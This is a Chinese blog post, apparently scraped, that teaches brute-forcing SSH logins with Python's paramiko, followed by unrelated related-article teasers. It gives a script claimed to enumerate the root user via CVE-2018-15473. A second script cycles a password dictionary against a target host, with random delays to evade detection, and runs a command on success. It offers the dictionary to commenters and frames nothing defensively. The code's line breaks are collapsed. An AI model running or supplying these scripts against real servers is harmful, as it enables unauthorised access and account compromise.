使用paramiko爆破ssh登录

ops/2025/3/10 5:10:38/

一.确认是否存在目标主机是否存在root用户

        重跑 CVE-2018-15473用户名枚举漏洞 检测:

python">import paramiko
from paramiko.ssh_exception import AuthenticationExceptiondef check_user(username, hostname, port):ssh = paramiko.SSHClient()ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())try:ssh.connect(hostname, port=port, username=username, password='invalid')except AuthenticationException as e:if 'Authentication failed.' in str(e):print(f"User {username} exists!")else:print(f"User {username} does not exist or connection error.")except Exception as e:print(f"Error: {e}")check_user('root', 'target_ip', 222)

这个基本都会显示存在。作者发现目标主机 上存在root用户。那么就可以进行下一步。

 二.爆破

python">import paramiko
import time
import random# 配置连接参数
host = 'target_ip'
port = 22
username = 'root'
file = open('ssh常用密码.txt', 'r')
passwords = file.readlines()def main():print('开始')client = paramiko.SSHClient()client.set_missing_host_key_policy(paramiko.AutoAddPolicy())for password in passwords:try:random_sleep_time = random.uniform(0.01, 0.1)time.sleep(random_sleep_time)# 建立SSH连接client.connect(hostname=host,port=port,username=username,password=password,timeout=10)# 执行简单命令测试stdin, stdout, stderr = client.exec_command('ls -l')print("连接成功!")print("密码: ", password)print("用户名:", username)print("命令结果:")print(stdout.read().decode())except paramiko.AuthenticationException:passexcept paramiko.SSHException as e:print(f"SSH连接错误: {str(e)}")except Exception as e:print(f"错误: {str(e)}")finally:# 关闭连接client.close()if __name__ == '__main__':main()

评论区评论‘密码’,即可获得常用ssh密码字典。


http://www.ppmy.cn/ops/164569.html

相关文章

广州哪家公司做柔性装备?富唯智能以科技重构镀膜生产新范式

广州哪家公司做柔性装备?富唯智能以科技重构镀膜生产新范式

在光学镀膜行业竞争白热化的今天,"广州哪家公司做柔性装备?" 成为众多企业寻求技术突破时最常搜索的关键词。作为扎根广州的智能制造领军企业,富唯智能用创新科技交出了一份令人瞩目的答卷 —— 其自主研发的柔性镀膜上下料设备&am…
阅读更多...
高效编程指南:PyCharm与DeepSeek的完美结合

高效编程指南:PyCharm与DeepSeek的完美结合

DeepSeek接入Pycharm 前几天DeepSeek的充值窗口又悄悄的开放了,这也就意味着我们又可以丝滑的使用DeepSeek的API进行各种辅助性工作了。本文我们来聊聊如何在代码编辑器中使用DeepSeek自动生成代码。 注:本文适用于所有的JetBrains开发工具&#xff0c…
阅读更多...
机器学习(六)

机器学习(六)

一,决策树: 简介: 决策树是一种通过构建类似树状的结构(颠倒的树),从根节点开始逐步对数据进行划分,最终在叶子节点做出预测结果的模型。 结构组成: 根节点:初始的数据集…
阅读更多...
【git】ssh配置提交 gitcode-ssh提交

【git】ssh配置提交 gitcode-ssh提交

【git】ssh配置提交 gitcode-ssh提交 之前一直用的是gitee和阿里云的仓库,前两天想在gitcode上面备份一下我的打洞代码和一些资料 就直接使用http克隆了下来 。 在提交的时候他一直会让我输入账号和密码,但是我之前根本没有设置过这个,根本没…
阅读更多...
期权帮|中证1000股指期权交割结算价怎么算?

期权帮|中证1000股指期权交割结算价怎么算?

期权帮锦鲤三三每日分享期权知识,帮助期权新手及时有效地掌握即市趋势与新资讯! 中证1000股指期权交割结算价怎么算? 一、按照最后交易日结算价: (1)计算方法:最后交易日标的指数&#xff08…
阅读更多...
SQL刷题:自连接(Self-Join)--通过将 同一张表连接两次,比较不同行之间的数据关系

SQL刷题:自连接(Self-Join)--通过将 同一张表连接两次,比较不同行之间的数据关系

例题: 表:Employee ---------------------- | Column Name | Type | ---------------------- | id | int | | name | varchar | | salary | int | | managerId | int | ---------------------- id 是该表的主键…
阅读更多...
Uniapp打包H5端弱网络环境下存在页面UI渲染错乱问题方案实现

Uniapp打包H5端弱网络环境下存在页面UI渲染错乱问题方案实现

一.需求 uniapp打包的H5项目,首页模块的业务逻辑偏多,调用的接口数量庞大,在弱网络的情况下切换了页面或者网络较好但是页面的UI未渲染完成的情况下快速地切换了页面会出现UI渲染错乱的问题,针对该问题个人从两个方面来进行处理&…
阅读更多...
美颜SDK架构揭秘:人脸美型API的底层实现与优化策略

美颜SDK架构揭秘:人脸美型API的底层实现与优化策略

在短视频、直播和社交娱乐行业的快速发展下,美颜SDK已成为各大应用的重要组成部分。其中,人脸美型API作为核心功能,决定了最终的美颜效果和用户体验。本文将深入探讨美颜SDK的人脸美型API的底层实现,并分享优化策略,帮…
阅读更多...
最新文章

Copyright @ 2022~2023